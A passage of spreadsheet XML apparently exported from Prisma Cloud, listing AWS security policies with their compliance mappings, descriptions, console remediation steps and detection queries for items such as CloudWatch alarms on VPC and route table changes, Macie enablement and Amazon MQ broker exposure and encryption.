      <c r="Z2028"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"eventSource=" or $.X.filterPattern contains "eventSource =") and ($.X.filterPattern does not contain "eventSource!=" and $.X.filterPattern does not contain "eventSource !=") and $.X.filterPattern contains kms.amazonaws.com and $.X.filterPattern contains DisableKey and $.X.filterPattern contains ScheduleKeyDeletion) and ($.X.metricTransformations[*] contains $.Y.metricName))'; show X; count(X) less than 1</t>
        </is>
      </c>
      <c r="AA2028" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2028" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2028" t="inlineStr">
        <is>
          <t>PC-AWS-CWT-506</t>
        </is>
      </c>
      <c r="AD2028" t="b">
        <v>1</v>
      </c>
      <c r="AE2028" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2028" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG20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8" t="inlineStr">
        <is>
          <t>6b36bc00-40f4-4b33-b602-d6b4bad628c9</t>
        </is>
      </c>
      <c r="AI2028" t="inlineStr">
        <is>
          <t>eb7b47d5-3991-4efb-bf15-b5a91eb7e5ba</t>
        </is>
      </c>
      <c r="AJ2028" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2028" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2029">
      <c r="A2029"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Risk Management in Technology (RMiT), CSA CCM v.4.0.6, PCI DSS v4.0, Telecommunications Security Act - TSA, Australian Energy Sector Cyber Security Framework (AESCSF), CIS v1.2.0 (AWS),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NYDFS 23 CRR-NY 500.0, MPAA Content Protection Best Practices, ISO/IEC 27002:2013, CIS v1.3.0 (AWS), Copy of ACSC Information Security Manual (ISM)-clone, GDPR, ISO 27002:2022, CDC NIST 800-53 Rev4, HITRUST CSF v.9.6.0, CIS Controls v7.1, ISO/IEC 27002:2013, CSA CCM v.4.0.1, CSA CCM v.4.0.6, Copy of CIS Controls v8, Insurance Regulatory And Development Authority Of India, Microsoft Cloud Security Benchmark v1, ISO/IEC 27001:2022, ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, CIS v2.0.0 (AWS) - Level 1, ISO/IEC 27017:2015, Microsoft Cloud Security Benchmark v1, ISO/IEC 27017:2015, NIST 800-53 Rev 5, CIS v1.4.0 (AWS), Secure Controls Framework (SCF) - 2022.2.1, ISO/IEC 27002:2013, PCI DSS v4.0, TX-RAMP Level 1, NIST SP 800-171 Revision 3, NIST CSF, Secure Controls Framework (SCF) - 2022.2.1, CDC NIST 800-53 Rev4, CRI Profile v2.0, CSA CCM v.4.0.1, ISO/IEC 27017:2015, TX-RAMP Level 2, CIS Controls v8, Secure Controls Framework (SCF) - 2024.2, CSA CCM v.4.0.1, CHC HITRUST CSF v.9.6.0, CIS v3.0.0 (AWS) Level 1,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CIS v1.5.0 (AWS) - Level 1, NIST SP 800-171 Revision 3, ISO/IEC 27017:2015, Fedramp (Low), ISO/IEC 27002:2013, CSA CCM v.4.0.1, ISO/IEC 27002:2013,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PCI DSS v4.0, MTSBv2_AWS,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wells fargo CIS v1.5.0 (AWS) - Level 1,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t>
        </is>
      </c>
      <c r="B2029" s="2" t="inlineStr">
        <is>
          <t>REVIEW</t>
        </is>
      </c>
      <c r="C2029" s="2" t="inlineStr"/>
      <c r="D2029" t="n">
        <v>0</v>
      </c>
      <c r="E2029" t="n">
        <v>0</v>
      </c>
      <c r="F2029" t="n">
        <v>55</v>
      </c>
      <c r="G2029" t="b">
        <v>1</v>
      </c>
      <c r="H20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29" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2029" t="inlineStr">
        <is>
          <t>aws-logs</t>
        </is>
      </c>
      <c r="K2029" t="inlineStr">
        <is>
          <t>AWS Log metric filter and alarm does not exist for VPC changes</t>
        </is>
      </c>
      <c r="L2029" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2029" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2029" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2029" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2029" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2029" t="inlineStr">
        <is>
          <t>Guidelines for System Monitoring</t>
        </is>
      </c>
      <c r="R2029" t="inlineStr">
        <is>
          <t>ISM-1228</t>
        </is>
      </c>
      <c r="S2029" t="inlineStr"/>
      <c r="T2029" t="b">
        <v>0</v>
      </c>
      <c r="U2029" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2029" t="inlineStr">
        <is>
          <t>aws-logs-describe-metric-filters</t>
        </is>
      </c>
      <c r="W2029" t="inlineStr">
        <is>
          <t>This policy identifies the AWS regions which do not have a log metric filter and alarm for VPC changes. Monitoring changes to VPC will help ensure that resources and services are not unintentionally exposed. It is recommended that a metric filter and alarm be established for changes made to VPCs.
NOTE: This policy will trigger alert if you have at least one Cloudtrail with the multi trial is enabled, Logs all management events in your account and is not set with specific log metric filter and alarm.</t>
        </is>
      </c>
      <c r="X2029"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29" t="inlineStr"/>
      <c r="Z2029"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CreateVpc and $.X.filterPattern contains DeleteVpc and $.X.filterPattern contains ModifyVpcAttribute and $.X.filterPattern contains AcceptVpcPeeringConnection and $.X.filterPattern contains CreateVpcPeeringConnection and $.X.filterPattern contains DeleteVpcPeeringConnection and $.X.filterPattern contains RejectVpcPeeringConnection and $.X.filterPattern contains AttachClassicLinkVpc and $.X.filterPattern contains DetachClassicLinkVpc and $.X.filterPattern contains DisableVpcClassicLink and $.X.filterPattern contains EnableVpcClassicLink) and ($.X.metricTransformations[*] contains $.Y.metricName))'; show X; count(X) less than 1</t>
        </is>
      </c>
      <c r="AA2029" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2029" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2029" t="inlineStr">
        <is>
          <t>PC-AWS-CWT-513</t>
        </is>
      </c>
      <c r="AD2029" t="b">
        <v>1</v>
      </c>
      <c r="AE2029" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2029" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG20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29" t="inlineStr">
        <is>
          <t>f65a0c46-8119-4585-bb28-fd3d5c80cef5</t>
        </is>
      </c>
      <c r="AI2029" t="inlineStr">
        <is>
          <t>6eae9955-7d4c-42dd-a1ae-33b84be138f1</t>
        </is>
      </c>
      <c r="AJ2029" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2029" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2030">
      <c r="A2030" t="inlineStr">
        <is>
          <t>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Risk Management in Technology (RMiT), CSA CCM v.4.0.6, PCI DSS v4.0, Australian Energy Sector Cyber Security Framework (AESCSF), wells fargo CIS v1.5.0 (AWS) - Level 1, PCI DSS v3.2.1, Otoritas Jasa Keuangan (OJK) 38 POJK.03 2016, ISO/IEC 27002:2013, ISO/IEC 27017:2015, ITSG-33, Secure Controls Framework (SCF) - 2024.2, CSA CCM v.4.0.1, CSA CCM v.4.0.1, NIST SP 800-171 Revision 3, MITRE ATT&amp;CK v12, CSA CCM v.4.0.1, CRI Profile v1.2.1, CSA CCM v4.0.12, CIS v1.3.0 (AWS), APRA (CPS 234) Information Security, NYDFS 23 CRR-NY 500.0, MPAA Content Protection Best Practices, ISO/IEC 27002:2013, Copy of ACSC Information Security Manual (ISM)-clone, GDPR, ISO 27002:2022, CDC NIST 800-53 Rev4, HITRUST CSF v.9.6.0, CIS Controls v7.1, ISO/IEC 27002:2013, CSA CCM v.4.0.1, CSA CCM v.4.0.6, Copy of CIS Controls v8, Insurance Regulatory And Development Authority Of India, Microsoft Cloud Security Benchmark v1, ISO/IEC 27001:2022, ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, ISO/IEC 27017:2015, Microsoft Cloud Security Benchmark v1, CIS v1.5.0 (AWS) - Level 1, ISO/IEC 27017:2015, CIS v1.2.0 (AWS), NIST 800-53 Rev 5, CIS v1.4.0 (AWS), Secure Controls Framework (SCF) - 2022.2.1, ISO/IEC 27002:2013, PCI DSS v4.0, TX-RAMP Level 1, NIST SP 800-171 Revision 3, NIST CSF, Secure Controls Framework (SCF) - 2022.2.1, CDC NIST 800-53 Rev4, CRI Profile v2.0, CSA CCM v.4.0.1, CIS v2.0.0 (AWS) - Level 1, ISO/IEC 27017:2015, TX-RAMP Level 2, CIS Controls v8, Secure Controls Framework (SCF) - 2024.2, CSA CCM v.4.0.1, CHC HITRUST CSF v.9.6.0,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Telecommunications Security Act - TSA, NIST CSF, CSA CCM v.4.0.1, jneytchev-fedramp-low, Demo_Daryl ACSC Information Security Manual (ISM), CIS Controls v8.1, ISO/IEC 27002:2013, Secure Controls Framework (SCF) - 2022.2.1, CIS v3.0.0 (AWS) Level 1, Risk Management in Technology (RMiT), MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, ACSC Information Security Manual (ISM), NIST 800-53 Rev4, CRI Profile v2.0, CSA CCM v.4.0.1, kashan ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security,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MTSBv2_AWS,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ISO/IEC 27018:2019, NIST CSF, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), CSA CCM v.4.0.1</t>
        </is>
      </c>
      <c r="B2030" s="2" t="inlineStr">
        <is>
          <t>REVIEW</t>
        </is>
      </c>
      <c r="C2030" s="2" t="inlineStr"/>
      <c r="D2030" t="n">
        <v>0</v>
      </c>
      <c r="E2030" t="n">
        <v>0</v>
      </c>
      <c r="F2030" t="n">
        <v>55</v>
      </c>
      <c r="G2030" t="b">
        <v>1</v>
      </c>
      <c r="H20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0" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2030" t="inlineStr">
        <is>
          <t>aws-logs</t>
        </is>
      </c>
      <c r="K2030" t="inlineStr">
        <is>
          <t>AWS Log metric filter and alarm does not exist for Route table changes</t>
        </is>
      </c>
      <c r="L2030" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2030" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2030" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2030" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2030" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2030" t="inlineStr">
        <is>
          <t>Guidelines for System Monitoring</t>
        </is>
      </c>
      <c r="R2030" t="inlineStr">
        <is>
          <t>ISM-1228</t>
        </is>
      </c>
      <c r="S2030" t="inlineStr"/>
      <c r="T2030" t="b">
        <v>0</v>
      </c>
      <c r="U2030" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2030" t="inlineStr">
        <is>
          <t>aws-logs-describe-metric-filters</t>
        </is>
      </c>
      <c r="W2030" t="inlineStr">
        <is>
          <t>This policy identifies the AWS regions which do not have a log metric filter and alarm for Route table changes. Monitoring changes to route tables will help ensure that all VPC traffic flows through an expected path. It is recommended that a metric filter and alarm be established for changes to route tables.
NOTE: This policy will trigger alert if you have at least one Cloudtrail with the multi trial is enabled, Logs all management events in your account and is not set with specific log metric filter and alarm.</t>
        </is>
      </c>
      <c r="X2030" t="inlineStr">
        <is>
          <t>1. Sign in to AWS Console
2. Navigate to CloudWatch dashboard
3. Click on 'Log groups' in the 'Logs' section (Left panel)
4. Select the log group created for your CloudTrail trail event logs (CloudTrail should be multi trail enabled with all management events captured) and click 'Create Metric Filter' button.
5. In 'Define Logs Metric Filter' page, add 'Filter pattern' value as 
{ ($.eventName = CreateRoute) || ($.eventName = CreateRouteTable) || ($.eventName = ReplaceRoute) || ($.eventName = ReplaceRouteTableAssociation) || ($.eventName = DeleteRouteTable) || ($.eventName = DeleteRoute) || ($.eventName = DisassociateRouteTable) }
and Click on 'Assign Metric'
6. In 'Create Metric Filter and Assign a Metric' page, Choose Filter Name, Metric Details parameter according to your requirement and click on 'Create Filter'
7. Click on 'Create Alarm',
 - In Step 1 specify metric details and conditions details as required and click on 'Next'
 - In Step 2 Select an SNS topic either by creating a new topic or use existing SNS topic/ARN and click on 'Next'
 - In Step 3 Select name and description to alarm and click on 'Next'
 - In Step 4 Preview your data entered and click on 'Create Alarm'</t>
        </is>
      </c>
      <c r="Y2030" t="inlineStr"/>
      <c r="Z2030" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-logs-describe-metric-filters' as X; config from cloud.resource where api.name = 'aws-cloudwatch-describe-alarms' as Y; config from cloud.resource where api.name = 'aws-cloudtrail-describe-trails' as Z; filter '(($.Z.cloudWatchLogsLogGroupArn is not empty and $.Z.cloudWatchLogsLogGroupArn contains $.X.logGroupName and $.Z.isMultiRegionTrail is true and $.Z.includeGlobalServiceEvents is true) and (($.X.filterPattern contains "eventName=" or $.X.filterPattern contains "eventName =") and ($.X.filterPattern does not contain "eventName!=" and $.X.filterPattern does not contain "eventName !=") and $.X.filterPattern contains CreateRoute and $.X.filterPattern contains CreateRouteTable and $.X.filterPattern contains ReplaceRoute and $.X.filterPattern contains ReplaceRouteTableAssociation and $.X.filterPattern contains DeleteRouteTable and $.X.filterPattern contains DeleteRoute and $.X.filterPattern contains DisassociateRouteTable) and ($.X.metricTransformations[*] contains $.Y.metricName))'; show X; count(X) less than 1</t>
        </is>
      </c>
      <c r="AA2030" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2030" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2030" t="inlineStr">
        <is>
          <t>PC-AWS-CWT-512</t>
        </is>
      </c>
      <c r="AD2030" t="b">
        <v>1</v>
      </c>
      <c r="AE2030" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2030" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG20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0" t="inlineStr">
        <is>
          <t>56bda49c-2091-43f0-a2b4-aa9cf4833d7c</t>
        </is>
      </c>
      <c r="AI2030" t="inlineStr">
        <is>
          <t>11a22c3f-fc37-4b5c-874f-4c0d474735d3</t>
        </is>
      </c>
      <c r="AJ2030" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2030" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2031">
      <c r="A2031" t="inlineStr"/>
      <c r="B2031" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2031" s="2" t="inlineStr"/>
      <c r="D2031" t="inlineStr"/>
      <c r="E2031" t="inlineStr"/>
      <c r="F2031" t="inlineStr"/>
      <c r="G2031" t="b">
        <v>1</v>
      </c>
      <c r="H20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1" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2031" t="inlineStr">
        <is>
          <t>aws-macie2</t>
        </is>
      </c>
      <c r="K2031" t="inlineStr">
        <is>
          <t>AWS Macie is not enabled</t>
        </is>
      </c>
      <c r="L2031" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2031" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2031" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2031" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2031" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2031" t="inlineStr"/>
      <c r="R2031" t="inlineStr"/>
      <c r="S2031" t="inlineStr"/>
      <c r="T2031" t="b">
        <v>0</v>
      </c>
      <c r="U2031" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2031" t="inlineStr">
        <is>
          <t>aws-macie2-session</t>
        </is>
      </c>
      <c r="W2031" t="inlineStr">
        <is>
          <t>This policy identifies the AWS Macie that is not enabled in specific regions. 
AWS Macie is a data security service that automatically discovers, classifies, and protects sensitive data in AWS, enhancing security and compliance posture. Failure to activate AWS Macie increases the risk of potentially missing out on automated detection and protection of sensitive data, leaving your organization more vulnerable to data breaches and compliance violations.
It is recommended to enable Macie in all regions for comprehensive adherence to security and compliance requirements.</t>
        </is>
      </c>
      <c r="X2031" t="inlineStr">
        <is>
          <t>To enable Macie in the specific region,
1. Log in to your AWS Management Console.
2. By using the AWS Region selector in the upper-right corner of the page, select the Region which is reported.
3. In the AWS Management Console, search for "Macie" in the services search bar or locate it under the "Security, Identity, &amp; Compliance" category.
4. On the Amazon Macie page, choose Get started.
5. Choose Enable Macie.
To re-enable macie after suspended in the region,
1. Log in to your AWS Management Console.
2. By using the AWS Region selector in the upper-right corner of the page, select the Region which is reported.
3. In the AWS Management Console, search for "Macie" in the services search bar or locate it under the "Security, Identity, &amp; Compliance" category.
4. In the Macie dashboard, navigate to the 'settings' section.
5. Click on the 'Re-enable Macie' button under the 'Suspend Macie' section.
After enabling Macie, you can further configure policies, alerts, and other settings according to your organization's security and compliance needs.</t>
        </is>
      </c>
      <c r="Y2031" t="inlineStr"/>
      <c r="Z2031" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-macie2-session' AND json.rule = status equals "ENABLED" as X; count(X) less than 1</t>
        </is>
      </c>
      <c r="AA2031" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2031" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2031" t="inlineStr">
        <is>
          <t>PC-AWS-AMCIE-1146</t>
        </is>
      </c>
      <c r="AD2031" t="b">
        <v>1</v>
      </c>
      <c r="AE2031" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2031" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG20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1" t="inlineStr">
        <is>
          <t>04836ceb-a10d-4b55-93ad-4a3f62dcbe75</t>
        </is>
      </c>
      <c r="AI2031" t="inlineStr">
        <is>
          <t>a3b417b0-1f8c-43e6-90fc-a0cd375fe488</t>
        </is>
      </c>
      <c r="AJ2031" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2031" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2032">
      <c r="A2032" t="inlineStr">
        <is>
          <t>kfirdaus AWS Account-CS, ISO/IEC 27001:2022, APRA (CPS 234) Information Security, Copy of ACSC Information Security Manual (ISM)-clone, HIPAA, RBI Baseline Cyber Security and Resilience Requirements, CIS Controls v8.1, NYDFS 23 CRR-NY 500.0, ISO 27002:2022, Copy of ACSC Information Security Manual (ISM)-clone, HITRUST v.9.4.2 [Deprecated], TX-RAMP Level 2, APRA (CPS 234) Information Security, ACSC Information Security Manual (ISM), ISO/IEC 27001:2022, ISO 27002:2022, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), Secure Controls Framework (SCF) - 2022.2.1, kashan ACSC Information Security Manual (ISM), Copy of ACSC Information Security Manual (ISM)-clone, ISO 27002:2022, HITRUST CSF v.11.2.0, kashan ACSC Information Security Manual (ISM), ITSG-33, TX-RAMP Level 2, kfirdaus AWS Account-CS, Secure Controls Framework (SCF) - 2024.2, Insurance Regulatory And Development Authority Of India, Telecommunications Security Act - TSA, SOC 2, TX-RAMP Level 1, PCI DSS v4.0, Copy of ACSC Information Security Manual (ISM)-clone, ITSG-33, MLPS 2.0 (Level 2), Risk Management in Technology (RMiT), CIS Controls v8, SOC 2, kfirdaus AWS Account-CS, SOC 2, ISO/IEC 27001:2022, Secure Controls Framework (SCF) - 2024.2, Sarbanes Oxley Act (SOX), APRA (CPS 234) Information Security, kashan ACSC Information Security Manual (ISM), CIS Controls v7.1, Secure Controls Framework (SCF) - 2022.2.1, ITSG-33, Cybersecurity Maturity Model Certification (CMMC) v.1.02, Australian Energy Sector Cyber Security Framework (AESCSF), CHC HITRUST CSF v.9.6.0, HITRUST v.9.4.2 [Deprecated], ISO 27002:2022, Copy of CIS Controls v8, NIST SP 800-172, PCI DSS v3.2.1, HITRUST CSF v.9.6.0, kashan ACSC Information Security Manual (ISM), MAS TRM 2021, ACSC Information Security Manual (ISM), ACSC Information Security Manual (ISM), Brazilian Data Protection Law (LGPD), TX-RAMP Level 2, Cybersecurity Maturity Model Certification (CMMC) v.1.02, ISO/IEC 27001:2022, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), ACSC Information Security Manual (ISM), CHC HITRUST CSF v.9.6.0, kfirdaus AWS Account-CS, NIST 800-53 Rev 5, HIPAA, HIPAA, HITRUST CSF v.9.6.0, PCI DSS v3.2.1, NIST SP 800-171 Revision 2</t>
        </is>
      </c>
      <c r="B2032" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2032" s="2" t="inlineStr"/>
      <c r="D2032" t="inlineStr"/>
      <c r="E2032" t="inlineStr"/>
      <c r="F2032" t="inlineStr"/>
      <c r="G2032" t="b">
        <v>1</v>
      </c>
      <c r="H20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2" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2032" t="inlineStr">
        <is>
          <t>aws-mq</t>
        </is>
      </c>
      <c r="K2032" t="inlineStr">
        <is>
          <t>AWS MQ is publicly accessible</t>
        </is>
      </c>
      <c r="L2032" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2032" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2032" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2032" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2032" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2032" t="inlineStr">
        <is>
          <t>Guidelines for Personnel Security</t>
        </is>
      </c>
      <c r="R2032" t="inlineStr">
        <is>
          <t>ISM-0854</t>
        </is>
      </c>
      <c r="S2032" t="inlineStr"/>
      <c r="T2032" t="b">
        <v>0</v>
      </c>
      <c r="U2032" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2032" t="inlineStr">
        <is>
          <t>aws-mq-broker</t>
        </is>
      </c>
      <c r="W2032" t="inlineStr">
        <is>
          <t>This policy identifies the AWS MQ brokers which are publicly accessible. It is advisable to use MQ brokers privately only from within your AWS Virtual Private Cloud (VPC). Ensure that the AWS MQ brokers provisioned in your AWS account are not publicly accessible from the Internet to avoid sensitive data exposure and minimize security risks.</t>
        </is>
      </c>
      <c r="X2032" t="inlineStr">
        <is>
          <t>Note: MQ broker configuration for public access cannot be modified. In case we need to update the MQ not to be public we need to recreate it.
1. Go to AWS console
2. Navigate to service 'Amazon MQ' from the 'Services' Menu
3. From the list of 'Brokers' select the reported MQ broker
4. From 'Details' section, copy all the configuration information.
5. Within 'Users' section, locate and copy the ActiveMQ Web Console access credentials.
6. Click on 'Brokers' from left panel, click on 'Create broker' 
7. Provide an unique name in field 'Broker name'
8. In 'Advanced settings' section, select 'No' for 'Public accessibility'
9. Set the new broker configuration parameters using the information copied at step no. 4
10. Set the existing ActiveMQ Web Console access credentials copied at step no. 5
11. Click on 'Create broker'
12. Once the new broker is created, you can replace the broker endpoints within your applications
To delete the publicly accessible broker, 
1. select the alerted from the list of 'Brokers' 
2. Click on 'Delete' button
3. When a dialog box pops up, enter the broker name to confirm and click on 'delete' button 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/public-policies/public-11
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/public-policies/public-11</t>
        </is>
      </c>
      <c r="Y2032" t="inlineStr"/>
      <c r="Z2032" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-mq-broker' AND json.rule = 'brokerState equals RUNNING and publiclyAccessible is true'
{"category":"Public","resourceTypes":["aws_mq_broker"]}</t>
        </is>
      </c>
      <c r="AA2032" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2032" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2032" t="inlineStr">
        <is>
          <t>PC-AWS-MQ-535-CKV_AWS_69</t>
        </is>
      </c>
      <c r="AD2032" t="b">
        <v>1</v>
      </c>
      <c r="AE2032" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2032" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG20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2" t="inlineStr">
        <is>
          <t>be6e507b-b1e5-4043-a8d7-94df078f81e6</t>
        </is>
      </c>
      <c r="AI2032" t="inlineStr">
        <is>
          <t>ac5e8046-6e9f-4eba-8132-9a6500fd760e</t>
        </is>
      </c>
      <c r="AJ2032" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2032" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2033">
      <c r="A2033" t="inlineStr">
        <is>
          <t>HIPAA, CSA CCM v4.0.12, HITRUST CSF v.11.2.0, SOC 2, GDPR, Microsoft Cloud Security Benchmark v1, TX-RAMP Level 1, NYDFS 23 CRR-NY 500.0, NIST 800-53 Rev 5</t>
        </is>
      </c>
      <c r="B2033" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2033" s="2" t="inlineStr"/>
      <c r="D2033" t="inlineStr"/>
      <c r="E2033" t="inlineStr"/>
      <c r="F2033" t="inlineStr"/>
      <c r="G2033" t="b">
        <v>1</v>
      </c>
      <c r="H20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3" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2033" t="inlineStr">
        <is>
          <t>aws-mq</t>
        </is>
      </c>
      <c r="K2033" t="inlineStr">
        <is>
          <t>AWS MQ Broker is not encrypted by Customer Managed Key (CMK)</t>
        </is>
      </c>
      <c r="L2033" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2033" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2033" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2033" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2033" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2033" t="inlineStr">
        <is>
          <t>SC</t>
        </is>
      </c>
      <c r="R2033" t="inlineStr">
        <is>
          <t>Cryptographic Key Establishment and Management</t>
        </is>
      </c>
      <c r="S2033" t="inlineStr"/>
      <c r="T2033" t="b">
        <v>0</v>
      </c>
      <c r="U2033" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2033" t="inlineStr">
        <is>
          <t>aws-mq-broker</t>
        </is>
      </c>
      <c r="W2033" t="inlineStr">
        <is>
          <t>This policy identifies AWS MQ Brokers that are not encrypted by Customer Managed Key (CMK).
AWS MQ Broker messages might contain sensitive information. AWS MQ Broker messages are encrypted by default by an AWS managed key but users can specify CMK to get enhanced security, control over the encryption key, and also comply with any regulatory requirements.
As a security best practice use of CMK to encrypt your MQ Broker is advisable as it gives you full control over the encrypted data.</t>
        </is>
      </c>
      <c r="X2033" t="inlineStr">
        <is>
          <t>AWS MQ Broker encryption option can be done only at the creation of MQ broker. You cannot change the encryption options once it has been created. To resolve this alert create a new MQ broker configuring encryption with CMK key, migrate all data to newly created MQ broker and then delete the reported MQ broker.
To create a new AWS MQ broker encryption with CMK key,
1. Log in to the AWS console
2. In the console, select the specific region from the region drop-down on the top right corner, for which the alert is generated
3. Go to the AWS MQ broker Dashboard
4. Click on 'Create brokers'
5. Select the broker engine type, deployment mode as per your business requirement
6. Under 'Configure settings', In Additional settings section choose Encryption option choose 'Customer managed CMKs are created and managed by you in AWS Key Management Service (KMS).' based on your business requirement.
7. Review and Create the MQ broker.
To delete reported MQ broker, refer following URL:
For ActiveMQ Broker: https://docs.aws.amazon.com/amazon-mq/latest/developer-guide/getting-started-activemq.html#delete-broker
For RabbitMQ Broker: https://docs.aws.amazon.com/amazon-mq/latest/developer-guide/getting-started-rabbitmq.html#rabbitmq-delete-broker 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-aws-mqbroker-is-encrypted-by-key-management-service-kms-using-a-customer-managed-key-cmk
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-aws-mqbroker-is-encrypted-by-key-management-service-kms-using-a-customer-managed-key-cmk</t>
        </is>
      </c>
      <c r="Y2033" t="inlineStr"/>
      <c r="Z2033" t="inlineStr">
        <is>
